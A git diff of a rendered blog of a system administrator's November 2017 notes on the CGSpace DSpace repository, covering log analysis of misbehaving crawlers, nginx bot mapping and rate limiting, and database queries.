         574 session_id=5771742CABA3D0780860B8DA81E0551B:ip_addr=137.108.70.7
        1012 session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A:ip_addr=137.108.70.6
    @@ -399,7 +399,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
     
  • Ask on the dspace-tech mailing list if it’s possible to use an existing item as a template for a new item
  • To follow up on the CORE bot traffic, there were almost 300,000 request yesterday:
  • -
    # grep "CORE/0.6" /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h
    +
    # grep "CORE/0.6" /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h
      139109 137.108.70.6
      139253 137.108.70.7
     
      @@ -416,7 +416,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
    • I’m really starting to get annoyed with these guys, and thinking about blocking their IP address for a few days to see if CGSpace becomes more stable
    • Actually, come to think of it, they aren’t even obeying robots.txt, because we actually disallow /discover and /search-filter URLs but they are hitting those massively:
    -
    # grep "CORE/0.6" /var/log/nginx/access.log | grep -o -E "GET /(discover|search-filter)" | sort -n | uniq -c | sort -rn 
    +
    # grep "CORE/0.6" /var/log/nginx/access.log | grep -o -E "GET /(discover|search-filter)" | sort -n | uniq -c | sort -rn 
      158058 GET /discover
       14260 GET /search-filter
     
      diff --git a/docs/2017-11/index.html b/docs/2017-11/index.html index a771a36c3..c5a96cb20 100644 --- a/docs/2017-11/index.html +++ b/docs/2017-11/index.html @@ -15,7 +15,7 @@ The CORE developers responded to say they are looking into their bot not respect Today there have been no hits by CORE and no alerts from Linode (coincidence?) -# grep -c "CORE" /var/log/nginx/access.log +# grep -c "CORE" /var/log/nginx/access.log 0 Generate list of authors on CGSpace for Peter to go through and correct: @@ -40,7 +40,7 @@ The CORE developers responded to say they are looking into their bot not respect Today there have been no hits by CORE and no alerts from Linode (coincidence?) -# grep -c "CORE" /var/log/nginx/access.log +# grep -c "CORE" /var/log/nginx/access.log 0 Generate list of authors on CGSpace for Peter to go through and correct: @@ -48,7 +48,7 @@ Generate list of authors on CGSpace for Peter to go through and correct: dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv; COPY 54701 "/> - + @@ -142,12 +142,12 @@ COPY 54701
      • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
      -
      # grep -c "CORE" /var/log/nginx/access.log
      +
      # grep -c "CORE" /var/log/nginx/access.log
       0
       
      • Generate list of authors on CGSpace for Peter to go through and correct:
      -
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
      +
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
       COPY 54701
       
      • Abenet asked if it would be possible to generate a report of items in Listing and Reports that had “International Fund for Agricultural Development” as the only investor
      • @@ -155,7 +155,7 @@ COPY 54701
      • Work on making the thumbnails in the item view clickable
      • Basically, once you read the METS XML for an item it becomes easy to trace the structure to find the bitstream link
      -
      //mets:fileSec/mets:fileGrp[@USE='CONTENT']/mets:file/mets:FLocat[@LOCTYPE='URL']/@xlink:href
      +
      //mets:fileSec/mets:fileGrp[@USE='CONTENT']/mets:file/mets:FLocat[@LOCTYPE='URL']/@xlink:href
       
      • METS XML is available for all items with this pattern: /metadata/handle/10568/95947/mets.xml
      • I whipped up a quick hack to print a clickable link with this URL on the thumbnail but it needs to check a few corner cases, like when there is a thumbnail but no content bitstream!
      • @@ -177,7 +177,7 @@ COPY 54701
      • It’s the first time in a few days that this has happened
      • I had a look to see what was going on, but it isn’t the CORE bot:
      -
      # awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
      +
      # awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
           306 68.180.229.31
           323 61.148.244.116
           414 66.249.66.91
      @@ -216,7 +216,7 @@ COPY 54701
       
      • But in the database the authors are correct (none with weird , / characters):
      -
      dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Livestock Research Institute%';
      +
      dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Livestock Research Institute%';
                        text_value                 |              authority               | confidence 
       --------------------------------------------+--------------------------------------+------------
        International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c |          0
      @@ -240,7 +240,7 @@ COPY 54701
       
    • Tsega had to restart Tomcat 7 to fix it temporarily
    • I will start by looking at bot usage (access.log.1 includes usage until 6AM today):
    -
    # cat /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         619 65.49.68.184
         840 65.49.68.199
         924 66.249.66.91
    @@ -268,11 +268,11 @@ COPY 54701
     
    • This user is responsible for hundreds and sometimes thousands of Tomcat sessions:
    -
    $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +
    $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     954
    -$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     6199
    -$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
    +$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
     7051
     
    • The worst thing is that this user never specifies a user agent string so we can’t lump it in with the other bots using the Tomcat Session Crawler Manager Valve
    • @@ -280,7 +280,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
    # grep -c 104.196.152.243 /var/log/nginx/access.log.1
     4681
    -# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P 'GET //?handle'
    +# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P 'GET //?handle'
     4618
     
    • I just realized that ciat.cgiar.org points to 104.196.152.243, so I should contact Leroy from CIAT to see if we can change their scraping behavior
    • @@ -288,44 +288,44 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
    $ grep -c 207.46.13.36 /var/log/nginx/access.log.1 
     2034
    -# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c "GET /discover"
     0
     
    • The next IP (157.55.39.161) also seems to be bingbot, and none of its requests are for URLs forbidden by robots.txt either:
    -
    # grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +
    # grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c "GET /discover"
     0
     
    • The next few seem to be bingbot as well, and they declare a proper user agent and do not request dynamic URLs like “/discover”:
    -
    # grep -c -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 
    +
    # grep -c -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 
     5997
    -# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "bingbot"
    +# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "bingbot"
     5988
    -# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
     0
     
    • The next few seem to be Googlebot, and they declare a proper user agent and do not request dynamic URLs like “/discover”:
    -
    # grep -c -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 
    +
    # grep -c -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 
     3048
    -# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c Google
    +# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c Google
     3048
    -# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
     0
     
    • The next seems to be Yahoo, which declares a proper user agent and does not request dynamic URLs like “/discover”:
    # grep -c 68.180.229.254 /var/log/nginx/access.log.1 
     1131
    -# grep  68.180.229.254 /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +# grep  68.180.229.254 /var/log/nginx/access.log.1 | grep -c "GET /discover"
     0
     
    • The last of the top ten IPs seems to be some bot with a weird user agent, but they are not behaving too well:
    -
    # grep -c -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 
    +
    # grep -c -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 
     2950
    -# grep -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
    +# grep -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 | grep -c "GET /discover"
     330
     
    • Their user agents vary, ie: @@ -338,9 +338,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
    • I’ll just keep an eye on that one for now, as it only made a few hundred requests to dynamic discovery URLs
    • While it’s not in the top ten, Baidu is one bot that seems to not give a fuck:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "7/Nov/2017" | grep -c Baiduspider
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "7/Nov/2017" | grep -c Baiduspider
     8912
    -# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "7/Nov/2017" | grep Baiduspider | grep -c -E "GET /(browse|discover|search-filter)"
    +# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "7/Nov/2017" | grep Baiduspider | grep -c -E "GET /(browse|discover|search-filter)"
     2521
     
    • According to their documentation their bot respects robots.txt, but I don’t see this being the case
    • @@ -349,7 +349,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
    • I should look in nginx access.log, rest.log, oai.log, and DSpace’s dspace.log.2017-11-07
    • Here are the top IPs making requests to XMLUI from 2 to 8 AM:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         279 66.249.66.91
         373 65.49.68.199
         446 68.180.229.254
    @@ -364,7 +364,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
     
  • Of those, most are Google, Bing, Yahoo, etc, except 63.143.42.244 and 63.143.42.242 which are Uptime Robot
  • Here are the top IPs making requests to REST from 2 to 8 AM:
  • -
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           8 207.241.229.237
          10 66.249.66.90
          16 104.196.152.243
    @@ -377,14 +377,14 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
     
    • The OAI requests during that same time period are nothing to worry about:
    -
    # cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           1 66.249.66.92
           4 66.249.66.90
           6 68.180.229.254
     
    • The top IPs from dspace.log during the 2–8 AM period:
    -
    $ grep -E '2017-11-07 0[2-8]' dspace.log.2017-11-07 | grep -o -E 'ip_addr=[0-9.]+' | sort -n | uniq -c | sort -h | tail
    +
    $ grep -E '2017-11-07 0[2-8]' dspace.log.2017-11-07 | grep -o -E 'ip_addr=[0-9.]+' | sort -n | uniq -c | sort -h | tail
         143 ip_addr=213.55.99.121
         181 ip_addr=66.249.66.91
         223 ip_addr=157.55.39.161
    @@ -414,9 +414,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
     
    • The whois data shows the IP is from China, but the user agent doesn’t really give any clues:
    -
    # grep 124.17.34.59 /var/log/nginx/access.log | awk -F'" ' '{print $3}' | sort | uniq -c | sort -h
    -    210 "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
    -  22610 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)"
    +
    # grep 124.17.34.59 /var/log/nginx/access.log | awk -F'" ' '{print $3}' | sort | uniq -c | sort -h
    +    210 "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
    +  22610 "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)"
     
    • A Google search for “LCTE bot” doesn’t return anything interesting, but this Stack Overflow discussion references the lack of information
    • So basically after a few hours of looking at the log files I am not closer to understanding what is going on!
    • @@ -424,7 +424,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
    • And as we speak Linode alerted that the outbound traffic rate is very high for the past two hours (about 12–14 hours)
    • At least for now it seems to be that new Chinese IP (124.17.34.59):
    -
    # grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         198 207.46.13.103
         203 207.46.13.80
         205 207.46.13.36
    @@ -438,17 +438,17 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
     
    • Seems 124.17.34.59 are really downloading all our PDFs, compared to the next top active IPs during this time!
    -
    # grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
    +
    # grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
     5948
    -# grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
    +# grep -E "07/Nov/2017:1[234]:" /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
     0
     
    • About CIAT, I think I need to encourage them to specify a user agent string for their requests, because they are not reuising their Tomcat session and they are creating thousands of sessions per day
    • All CIAT requests vs unique ones:
    -
    $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | wc -l
    +
    $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | wc -l
     3506
    -$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | sort | uniq | wc -l
    +$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | sort | uniq | wc -l
     3506
     
    • I emailed CIAT about the session issue, user agent issue, and told them they should not scrape the HTML contents of communities, instead using the REST API
    • @@ -459,18 +459,18 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
      • But they literally just made this request today:
      -
      180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] "GET /discover?filtertype_0=crpsubject&filter_relational_operator_0=equals&filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&filtertype=subject&filter_relational_operator=equals&filter=WATER+RESOURCES HTTP/1.1" 200 82265 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
      +
      180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] "GET /discover?filtertype_0=crpsubject&filter_relational_operator_0=equals&filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&filtertype=subject&filter_relational_operator=equals&filter=WATER+RESOURCES HTTP/1.1" 200 82265 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
       
      • Along with another thousand or so requests to URLs that are forbidden in robots.txt today alone:
      # grep -c Baiduspider /var/log/nginx/access.log
       3806
      -# grep Baiduspider /var/log/nginx/access.log | grep -c -E "GET /(browse|discover|search-filter)"
      +# grep Baiduspider /var/log/nginx/access.log | grep -c -E "GET /(browse|discover|search-filter)"
       1085
       
      • I will think about blocking their IPs but they have 164 of them!
      -
      # grep "Baiduspider/2.0" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq | wc -l
      +
      # grep "Baiduspider/2.0" /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq | wc -l
       164
       

      2017-11-08

        @@ -478,12 +478,12 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
      • Linode sent another alert about CPU usage in the morning at 6:12AM
      • Jesus, the new Chinese IP (124.17.34.59) has downloaded 24,000 PDFs in the last 24 hours:
      -
      # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "0[78]/Nov/2017:" | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
      +
      # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "0[78]/Nov/2017:" | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
       24981
       
      • This is about 20,000 Tomcat sessions:
      -
      $ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59' | sort | uniq | wc -l
      +
      $ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59' | sort | uniq | wc -l
       20733
       
      • I’m getting really sick of this
      • @@ -498,7 +498,7 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
      map $remote_addr $ua {
           # 2017-11-08 Random Chinese host grabbing 20,000 PDFs
      -    124.17.34.59     'ChineseBot';
      +    124.17.34.59     'ChineseBot';
           default          $http_user_agent;
       }
       
        @@ -516,9 +516,9 @@ proxy_set_header User-Agent $ua;
      • I merged the clickable thumbnails code to 5_x-prod (#347) and will deploy it later along with the new bot mapping stuff (and re-run the Asible nginx and tomcat tags)
      • I was thinking about Baidu again and decided to see how many requests they have versus Google to URL paths that are explicitly forbidden in robots.txt:
      -
      # zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E "GET /(browse|discover|search-filter)"
      +
      # zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E "GET /(browse|discover|search-filter)"
       22229
      -# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E "GET /(browse|discover|search-filter)"
      +# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E "GET /(browse|discover|search-filter)"
       0
       
      • It seems that they rarely even bother checking robots.txt, but Google does multiple times per day!
      • @@ -538,20 +538,20 @@ proxy_set_header User-Agent $ua;
        • Awesome, it seems my bot mapping stuff in nginx actually reduced the number of Tomcat sessions used by the CIAT scraper today, total requests and unique sessions:
        -
        # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Nov/2017' | grep -c 104.196.152.243
        +
        # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Nov/2017' | grep -c 104.196.152.243
         8956
        -$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
        +$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
         223
         
        • Versus the same stats for yesterday and the day before:
        -
        # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '08/Nov/2017' | grep -c 104.196.152.243 
        +
        # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '08/Nov/2017' | grep -c 104.196.152.243 
         10216
        -$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
        +$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
         2592
        -# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep '07/Nov/2017' | grep -c 104.196.152.243
        +# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep '07/Nov/2017' | grep -c 104.196.152.243
         8120
        -$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
        +$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
         3506
         
        • The number of sessions is over ten times less!
        • @@ -569,7 +569,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
        • Update the Ansible infrastructure templates to be a little more modular and flexible
        • Looking at the top client IPs on CGSpace so far this morning, even though it’s only been eight hours:
        -
        # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "12/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
        +
        # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "12/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
             243 5.83.120.111
             335 40.77.167.103
             424 66.249.66.91
        @@ -584,21 +584,21 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
         
      • 5.9.6.51 seems to be a Russian bot:
      # grep 5.9.6.51 /var/log/nginx/access.log | tail -n 1
      -5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] "GET /handle/10568/16515/recent-submissions HTTP/1.1" 200 5097 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
      +5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] "GET /handle/10568/16515/recent-submissions HTTP/1.1" 200 5097 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
       
      • What’s amazing is that it seems to reuse its Java session across all requests:
      -
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2017-11-12
      +
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2017-11-12
       1558
      -$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
      +$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
       1
       
      • Bravo to MegaIndex.ru!
      • The same cannot be said for 95.108.181.88, which appears to be YandexBot, even though Tomcat’s Crawler Session Manager valve regex should match ‘YandexBot’:
      # grep 95.108.181.88 /var/log/nginx/access.log | tail -n 1
      -95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] "GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1" 200 972019 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
      -$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-12
      +95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] "GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1" 200 972019 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
      +$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-12
       991
       
      • Move some items and collections on CGSpace for Peter Ballantyne, running move_collections.sh with the following configuration:
      • @@ -612,7 +612,7 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-
      • The solution I came up with uses tricks from both of those
      • I deployed the limit on CGSpace and DSpace Test and it seems to work well:
      -
      $ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
      +
      $ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
       HTTP/1.1 200 OK
       Connection: keep-alive
       Content-Encoding: gzip
      @@ -627,7 +627,7 @@ X-Cocoon-Version: 2.2.0
       X-Content-Type-Options: nosniff
       X-Frame-Options: SAMEORIGIN
       X-XSS-Protection: 1; mode=block
      -$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
      +$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
       HTTP/1.1 503 Service Temporarily Unavailable
       Connection: keep-alive
       Content-Length: 206
      @@ -642,9 +642,9 @@ Server: nginx
       
      • At the end of the day I checked the logs and it really looks like the Baidu rate limiting is working, HTTP 200 vs 503:
      -
      # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "13/Nov/2017" | grep "Baiduspider" | grep -c " 200 "
      +
      # zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "13/Nov/2017" | grep "Baiduspider" | grep -c " 200 "
       1132
      -# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "13/Nov/2017" | grep "Baiduspider" | grep -c " 503 "
      +# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "13/Nov/2017" | grep "Baiduspider" | grep -c " 503 "
       10105
       
      • Helping Sisay proof 47 records for IITA: https://dspacetest.cgiar.org/handle/10568/97029
      • @@ -695,7 +695,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
      • After a few minutes the connecitons went down to 44 and CGSpace was kinda back up, it seems like Tsega restarted Tomcat
      • Looking at the REST and XMLUI log files, I don’t see anything too crazy:
      -
      # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep "17/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
      +
      # cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep "17/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
            13 66.249.66.223
            14 207.46.13.36
            17 207.46.13.137
      @@ -706,7 +706,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
          1400 70.32.83.92
          1503 50.116.102.77
          6037 45.5.184.196
      -# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "17/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
      +# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "17/Nov/2017" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
           325 139.162.247.24
           354 66.249.66.223
           422 207.46.13.36
      @@ -737,7 +737,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
       
    • Linode sent an alert that CGSpace was using a lot of CPU around 4–6 AM
    • Looking in the nginx access logs I see the most active XMLUI users between 4 and 6 AM:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "19/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "19/Nov/2017:0[456]" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         111 66.249.66.155
         171 5.9.6.51
         188 54.162.241.40
    @@ -751,7 +751,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
     
    • 66.249.66.153 appears to be Googlebot:
    -
    66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] "GET /handle/10568/2203 HTTP/1.1" 200 6309 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    +
    66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] "GET /handle/10568/2203 HTTP/1.1" 200 6309 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
     
    • We know Googlebot is persistent but behaves well, so I guess it was just a coincidence that it came at a time when we had other traffic and server activity
    • In related news, I see an Atmire update process going for many hours and responsible for hundreds of thousands of log entries (two thirds of all log entries)
